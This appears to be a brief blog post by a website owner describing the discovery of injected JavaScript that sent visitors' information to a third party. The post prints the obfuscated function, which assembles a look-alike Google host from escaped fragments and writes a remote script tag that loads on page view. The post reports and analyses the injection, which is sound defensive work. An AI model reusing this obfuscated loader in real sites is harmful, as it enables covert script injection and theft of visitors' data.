Just today I came across a javascript hack that was sending information for website users to a third party location.

The way I found this out – other than getting malware notices from Google, was to do a wireshark trace on the offending website. From there I saw some interesting requests. Upon closer inspection, I found a piece of code with this function that I did not recognize:

function advQuery(){
var Host=”http://google.com/”;Track=”/if.php”;get=unescape(“%6E%65%74”);
document.write(unescape(“%3Cscript src='”+Host.substr(0,9)+unescape(“u0030u0030″)+Host.substr(9,5)+get));
document.write(unescape(Track+”‘ type=’text/javascript’%3E%3C/script%3E”));
};advQuery();

It is easy enough to clear up, but now I need to find out how it got there!